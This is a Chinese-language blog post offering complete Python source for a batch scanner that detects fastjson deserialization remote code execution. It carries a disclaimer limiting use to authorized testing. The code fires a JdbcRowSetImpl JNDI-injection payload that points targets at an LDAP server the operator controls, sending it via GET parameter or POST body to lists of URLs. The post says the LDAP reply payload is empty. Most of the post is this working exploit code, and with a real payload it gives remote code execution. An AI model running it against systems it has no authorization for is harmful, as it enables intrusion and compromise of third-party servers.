标题: fastjson rce 扫描器 分类: Python 创建: 2022-12-03 14:11 修改: 链接: http://0x2531.tech/python/202212031411.txt -------------------------------------------------------------------------------- ********** 【声明】此工具仅用于企业安全人员自查验证自身企业资产的安全风险,或有合法授权的安全测试,请勿用 于其他用途,如有,后果自负。 ********** 该扫描器基于 fastjson_tool.jar 工具,批量化的对 GET 和 POST 接口进行扫描,用来主动发现存在 漏洞的接口。 fastjson-scan 在子进程中通过执行 fastjson_tool.jar 启动 LDAP 服务,用来接收潜在受漏洞影 响测试接口发来的请求。如果测试接口存在 fastjson 反序列化远程执行漏洞,LDAP 将返回 payload, 然后退出进程。通过检测 Java 进程存在与否,我们就能知道测试接口是否存在漏洞。注意,因为只是验证 漏洞是否存在,fastjson-scan 的 payload 实际上为空。 GET 接口默认只测试 d 参数,需根据实际测试对象参数进行调整。在真正运行 fastjson-scan 前,请 先在终端运行 fastjson_tool.jar 以确保能正常启动 LDAP 服务。 下面是 fastjson-scan.py 的完整代码: ========== # -*- coding: utf-8 -*- import argparse import time import requests import json import os import sys from os.path import join import subprocess from multiprocessing import Process import socket from termcolor import cprint import colorama colorama.init() # Disable SSL warnings try: import requests.packages.urllib3 requests.packages.urllib3.disable_warnings() except Exception: pass if len(sys.argv) <= 1: print(f'\n{sys.argv[0]} -h for help.') exit(0) parser = argparse.ArgumentParser() parser.add_argument("-u", "--url", dest="url", help="Check a single URL.") parser.add_argument("-f", dest="file", help="Check a list of URL.") parser.add_argument("--method", dest="method", help="HTTP Method: (get, post) - [Default: get].", default="get") parser.add_argument("--server-ip", dest="server_ip", help="LDAP Server IP - [Default: 0.0.0.0].", default="0.0.0.0") parser.add_argument("--server-port", dest="server_port", help="LDAP Server Port - [Default: 8888].", default="8888") parser.add_argument("--retry", dest="retry", help="Request url times - [Default: 1].", default=1, type=int) args = parser.parse_args() headers = { "content-type": "application/json", "user-agent": "fastjson-scan v1.0", } payload = f'{{"e":{{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"}}, "f":{{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap:// {args.server_ip}:{args.server_port}/Object","autoCommit":true}}}}' def check_port_is_open(): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) socket.setdefaulttimeout(3) # if result is zero, prot is open result = s.connect_ex((args.server_ip, int(args.server_port))) s.close() return (result == 0) def call_java(): try: subprocess.run(['java', '-cp', join(os.path.dirname(os.path.realpath(__file__)), 'fastjson_tool.jar'), 'fastjson.HLDAPServer', args.server_ip, args.server_port, ''], stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT) except KeyboardInterrupt as e: pass def call_api(url): code = 0 try: if args.method.upper() == "GET": r = requests.get(url+"?d="+payload, headers=headers, timeout=10) if args.method.upper() == "POST": r = requests.post(url, headers=headers, json=json.loads(payload), timeout=10) code = r.status_code except requests.exceptions.RequestException as e: pass return code if __name__ == "__main__": # generate a list of url urls = [] if args.url: urls.append(args.url) if args.file: with open(args.file, "r") as f: while (url := f.readline().rstrip()): urls.append(url) # start ldap server try: p = Process(target=call_java, args=()) except KeyboardInterrupt as e: pass p.start() time.sleep(3) # scan url for url in urls: """ some app running in vm and docker, a request maybe send to vm or docker, so retry make sure completely fix. """ for _ in range(args.retry): code = call_api(url) time.sleep(0.1) # check ldap server running or not if p.is_alive(): cprint(f"{args.method.upper()}: [{code}] {url}", "green") else: # found fastjson rce cprint(f"FOUND: {args.method.upper()}: [{code}] {url}", "red") # if stop, start ldap server again try: p = Process(target=call_java, args=()) except KeyboardInterrupt as e: pass p.start() time.sleep(3) cprint('\n[*] Done, please ctrl+c to stop ldap server.', 'green') # wait to stop ldap server while True: try: time.sleep(10) except KeyboardInterrupt as e: break p.terminate() ==========